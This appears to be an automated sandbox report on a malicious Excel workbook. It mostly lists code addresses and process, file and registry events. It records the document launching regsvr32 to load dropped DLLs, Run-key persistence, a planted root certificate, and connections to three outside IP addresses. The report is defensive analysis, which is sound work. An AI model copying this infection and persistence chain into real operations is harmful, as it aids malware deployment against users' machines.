                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00238690
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00217694
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00238C94
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00219298
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021C498
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022B898
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00223698
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00234098
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021569C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022629C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0023629C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00217AF0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022B2F0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002184F8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002364F8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021EAC4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00211CCC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00228ECC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021B8D0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002298DC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022B520
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00219D24
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00223524
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00239124
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00212128
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00231728
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00233D28
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00235B28
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022D32C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022CF30
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00230930
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021A734
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00225334
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021BD00
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021E708
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00225508
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00228D0C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00222110
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00225B18
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021871C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00228560
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00211364
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021FF64
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021C364
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021E368
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00239568
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021E570
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021F174
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022C974
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00228778
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00237348
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00214B4C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022F550
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00220954
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00230D54
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00216B5C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00211B5C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00218FA0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002259A0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00224FA4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021D1AC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002297AC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00221DAC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002347B0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00222780
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00235D84
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022FB88
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00223B88
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00232B8C
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00215590
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00227198
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021F3E0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00223FE0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002299E8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002199EC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00219BEC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_00227BF8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002169C0
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021D1C6
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021A1D4
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_002179D8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0022C1DC
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_002E0000
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0204FA08
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_02039E38
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203DA80
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020338A5
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02052CBC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020548E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02040310
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204D718
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02039144
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02032F53
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204E76C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020557B4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02035DB4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02034DDC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203B1E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02033BE8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020473F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02058A04
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031000
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02045400
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02053C0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204E614
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031A1C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203741C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203BA24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02051A2C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203E828
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02049230
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203BE34
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02032834
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02042244
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02044C48
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02050454
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02036650
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204AE50
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0205005C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203C659
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02046464
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02041664
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031660
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203D864
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204827C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02035478
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02032A7C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02052A84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02036880
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02054680
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203AE84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204308C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0205748C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02045694
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02058C94
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02058690
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02037694
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204629C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0205629C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02039298
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203C498
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204B898
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02043698
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02054098
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203569C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02057EA4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02034CA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020410AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203D4B2
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020448B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020378B6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020396B8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203EAC4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02048ECC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031CCC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203B8D0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020498DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020338DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02037AF0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204B2F0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020384F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020564F8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02032B00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203BD00
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02048D0C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203E708
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02045508
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02042110
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02045B18
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203871C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02043524
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02059124
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204B520
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02039D24
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204D32C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02032128
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02051728
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02053D28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02055B28
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02045334
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204CF30
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02050930
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203A734
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02057348
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02034B4C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02040954
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02050D54
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204F550
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02036B5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031B5C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02048560
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02031364
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203FF64
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203C364
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203E368
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02059568
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204C974
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203E570
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203F174
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02048778
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02055D84
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02042780
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02052B8C
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204FB88
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02043B88
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02035590
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02047198
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02044FA4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02038FA0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020459A0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020497AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02041DAC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203D1AC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020547B0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020369C0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203D1C6
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203A1D4
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0204C1DC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020379D8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0203F3E0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02043FE0
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020499E8
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_020399EC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02039BEC
                        Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_02047BF8
                        Source: C:\Windows\System32\regsvr32.exe | Code function: String function: 000000018002CA30 appears 48 times
                        Source: Untitled-09112022.xls | ReversingLabs: Detection: 46%
                        Source: Untitled-09112022.xls | Virustotal: Detection: 61%
                        Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                        Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx
                        Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx
                        Source: unknown | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe" "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll
                        Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\elv1.ooocccxxx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR4AB5.tmp
                        Source: classification engine | Classification label: mal100.troj.expl.evad.winXLS@12/10@5/53
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
                        Source: Untitled-09112022.xls | OLE indicator, Workbook stream: true
                        Source: Untitled-09112022.xls.0.dr | OLE indicator, Workbook stream: true
                        Source: 4DF60000.0.dr | OLE indicator, Workbook stream: true
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02015DB4 CloseHandle,Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,
                        Source: Window Recorder | Window detected: More than 3 window changes detected
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                        Source: Untitled-09112022.xls | Initial sample: OLE indicators vbamacros = False
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00000001800131BD push rdi; ret
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180013749 push rdi; ret
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02033A7E push ebp; ret
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0201838C push eax; ret
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02033BE1 push ebp; ret
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202E0D3 push 09B8E1F7h; retf
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202E0E9 push 8B48E1F7h; retf
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02033127 push ebp; ret
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02032E55 push ebp; retf
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_02032F5E push ebp; ret
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0202E5C5 pushad ; ret
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021838C push eax; ret
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0203838C push eax; ret
                        Source: Ji8QgmpX3lS3yT[1].dll.0.dr | Static PE information: section name: _RDATA
                        Source: elv1.ooocccxxx.0.dr | Static PE information: section name: _RDATA
                        Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\elv1.ooocccxxx
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dll
                        Source: C:\Windows\System32\regsvr32.exe | File created: C:\Windows\System32\FgEHLIiiJRN\xoEOackyxDExhQ.dll (copy)

                        Boot Survival

                        Source: C:\Windows\System32\regsvr32.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run xoEOackyxDExhQ.dll
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\elv1.ooocccxxx

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll:Zone.Identifier read attributes | delete
                        Source: C:\Windows\System32\regsvr32.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\regsvr32.exe TID: 2888 | Thread sleep time: -120000s >= -30000s
                        Source: C:\Windows\System32\regsvr32.exe TID: 2888 | Thread sleep time: -60000s >= -30000s
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Ji8QgmpX3lS3yT[1].dll
                        Source: C:\Windows\System32\regsvr32.exe | API coverage: 9.1 %
                        Source: C:\Windows\System32\regsvr32.exe | Process information queried: ProcessInformation
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180029290 FindFirstFileExW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018002972C FindFirstFileExW,FindNextFileW,FindClose,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180028B30 _invalid_parameter_noinfo,_invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 6_2_0021DA80 FindNextFileW,FindFirstFileW,FindClose,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_0203DA80 FindNextFileW,FindFirstFileW,FindClose,
                        Source: C:\Windows\System32\regsvr32.exe | File Volume queried: C:\ FullSizeInformation
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180003460 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018002DE88 GetProcessHeap,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180003460 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180003648 SetUnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00000001800156F8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_0000000180002E94 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

                        HIPS / PFW / Operating System Protection Evasion

                        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 115.178.55.22 80
                        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 172.105.115.71 8080
                        Source: C:\Windows\System32\regsvr32.exe | Network Connect: 218.38.121.17 443
                        Source: Yara match | File source: C:\Users\user\Desktop\4DF60000, type: DROPPED
                        Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\FgEHLIiiJRN\xoEOackyxDExhQ.dll"
                        Source: C:\Windows\System32\regsvr32.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: try_get_function,GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: EnumSystemLocalesW,
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_00000001800243D0 cpuid
                        Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_000000018002D450 try_get_function,GetSystemTimeAsFileTime,

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 0000000B.00000002.1193361768.00000000001EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000006.00000002.1193452350.00000000002FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 11.2.regsvr32.exe.2b0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 6.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 11.2.regsvr32.exe.2b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.regsvr32.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 6.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 4.2.regsvr32.exe.4d0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000004.00000002.920122880.0000000002011000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000004.00000002.920051864.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000006.00000002.1193389765.0000000000211000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.1193544536.0000000002031000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000006.00000002.1193348564.0000000000160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000B.00000002.1193467860.00000000002B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic; numeric prefixes are the report's per-technique counts):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 2 Scripting; 43 Exploitation for Client Execution; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell
